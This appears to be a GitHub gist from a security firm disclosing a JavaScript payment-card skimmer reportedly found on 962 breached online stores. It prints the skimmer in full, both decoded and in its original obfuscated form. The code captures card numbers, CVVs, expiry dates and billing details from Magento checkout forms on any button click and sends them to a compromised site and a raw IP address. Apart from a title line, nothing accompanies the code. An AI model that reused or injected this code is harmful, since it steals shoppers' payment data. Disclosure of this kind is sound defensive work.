Skip to content

Instantly share code, notes, and snippets.

@gwillem gwillem/decoded.js
Last active Jul 9, 2019

Embed
What would you like to do?
962 stores found breached on the 4th of July - https://sansec.io
// Decoded by Sanguine Security <info@sansec.io>
String.prototype.hexEncode = function() {
var a, b;
var output = '';
for (b = 0; b < this.length; b++) {
a = this.charCodeAt(b).toString(16);
output += ('000' + a).slice(-4)
};
return output
};
function obfuscate(arg) {
var b64 = btoa(arg);
var b64hex = (b64.hexEncode());
var blob = '';
for (var i = 0; i < b64hex.length; i++) {
blob += (b64hex[i].charCodeAt(0) << 3) + '*'
};
var blobb64 = btoa(blob);
return blobb64
}
function addtoev() {
var allButtons = document.getElementsByClassName('button');
for (i = 0; i < allButtons.length; i++) {
allButtons[i].addEventListener('click', function() {
var ccCounter = '';
var serialPayload = '';
if (document.getElementsByName('payment[cc_number]')[0]) {
serialPayload += document.getElementsByName('payment[cc_number]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_cid]')[0]) {
ccCounter = document.getElementsByName('payment[cc_cid]')[0].value;
serialPayload += document.getElementsByName('payment[cc_cid]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_month]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_month]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_exp_year]')[0]) {
serialPayload += document.getElementsByName('payment[cc_exp_year]')[0].value + '|'
};
if (document.getElementsByName('payment[cc_owner]')[0]) {
serialPayload += document.getElementsByName('payment[cc_owner]')[0].value + '|'
};
if (document.getElementsByName('billing[firstname]')[0]) {
serialPayload += document.getElementsByName('billing[firstname]')[0].value + '|'
};
if (document.getElementsByName('billing[lastname]')[0]) {
serialPayload += document.getElementsByName('billing[lastname]')[0].value + '|'
};
if (document.getElementsByName('billing[telephone]')[0]) {
serialPayload += document.getElementsByName('billing[telephone]')[0].value + '|'
};
if (document.getElementsByName('billing[street][]')[0]) {
serialPayload += document.getElementsByName('billing[street][]')[0].value + '|'
};
if (document.getElementsByName('billing[city]')[0]) {
serialPayload += document.getElementsByName('billing[city]')[0].value + '|'
};
if (document.getElementsByName('billing[postcode]')[0]) {
serialPayload += document.getElementsByName('billing[postcode]')[0].value + '|'
};
if (document.getElementsByName('billing[region_id]')[0]) {
serialPayload += document.getElementsByName('billing[region_id]')[0].value + '|'
};
if (document.getElementsByName('shipping[country_id]')[0]) {
serialPayload += document.getElementsByName('shipping[country_id]')[0].value + '|'
};
if (ccCounter != '') {
var payloadObj = {
Domain: 'all',
d: obfuscate(serialPayload)
};
rand = Math.floor((Math.random() * 1000000) + 1);
urll = 'https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=' + btoa(JSON.stringify(payloadObj));
var req1 = new XMLHttpRequest();
req1.open('GET', urll, false);
req1.send();
urll = 'http://89.32.251.136/counter/index.php?v=' + btoa(JSON.stringify(payloadObj));
var req2 = new XMLHttpRequest();
req2.open('GET', urll, false);
req2.send()
}
})
}
}
window.addEventListener('load', function() {
addtoev()
})
var _0xe6b4=["hexEncode","prototype","","length","charCodeAt","slice","000","*","button","getElementsByClassName","click","payment[cc_number]","getElementsByName","value","|","payment[cc_cid]","payment[cc_exp_month]","payment[cc_exp_year]","payment[cc_owner]","billing[firstname]","billing[lastname]","billing[telephone]","billing[street][]","billing[city]","billing[postcode]","billing[region_id]","shipping[country_id]","all","random","floor","https://www.tarrianalee.co.uk/js/mage/adminhtml/wysiwyg/tiny_mce/plugins/magentovariable/img/validate.php?v=","stringify","GET","open","send","http://89.32.251.136/counter/index.php?v=","addEventListener","load"];String[_0xe6b4[1]][_0xe6b4[0]]= function(){var _0x3692x1,_0x3692x2;var _0x3692x3=_0xe6b4[2];for(_0x3692x2= 0;_0x3692x2< this[_0xe6b4[3]];_0x3692x2++){_0x3692x1= this[_0xe6b4[4]](_0x3692x2).toString(16);_0x3692x3+= (_0xe6b4[6]+ _0x3692x1)[_0xe6b4[5]](-4)};return _0x3692x3};function sa(_0x3692x5){var _0x3692x6=btoa(_0x3692x5);var _0x3692x7=(_0x3692x6[_0xe6b4[0]]());var _0x3692x8=_0xe6b4[2];for(var _0x3692x2=0;_0x3692x2< _0x3692x7[_0xe6b4[3]];_0x3692x2++){_0x3692x8+= (_0x3692x7[_0x3692x2][_0xe6b4[4]](0)<< 3)+ _0xe6b4[7]};var _0x3692x9=btoa(_0x3692x8);return _0x3692x9}function addtoev(){var _0x3692xb=document[_0xe6b4[9]](_0xe6b4[8]);for(i= 0;i< _0x3692xb[_0xe6b4[3]];i++){_0x3692xb[i][_0xe6b4[36]](_0xe6b4[10],function(){var _0x3692xc=_0xe6b4[2];var _0x3692xd=_0xe6b4[2];if(document[_0xe6b4[12]](_0xe6b4[11])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[11])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[15])[0]){_0x3692xc= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]];_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[15])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[16])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[16])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[17])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[17])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[18])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[18])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[19])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[19])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[20])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[20])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[21])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[21])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[22])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[22])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[23])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[23])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[24])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[24])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[25])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[25])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(document[_0xe6b4[12]](_0xe6b4[26])[0]){_0x3692xd+= document[_0xe6b4[12]](_0xe6b4[26])[0][_0xe6b4[13]]+ _0xe6b4[14]};if(_0x3692xc!= _0xe6b4[2]){var _0x3692xe={Domain:_0xe6b4[27],d:sa(_0x3692xd)};rand= Math[_0xe6b4[29]]((Math[_0xe6b4[28]]()* 1000000)+ 1);urll= _0xe6b4[30]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692xf= new XMLHttpRequest();_0x3692xf[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692xf[_0xe6b4[34]]();urll= _0xe6b4[35]+ btoa(JSON[_0xe6b4[31]](_0x3692xe));var _0x3692x10= new XMLHttpRequest();_0x3692x10[_0xe6b4[33]](_0xe6b4[32],urll,false);_0x3692x10[_0xe6b4[34]]()}})}}window[_0xe6b4[36]](_0xe6b4[37],function(){addtoev()})
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.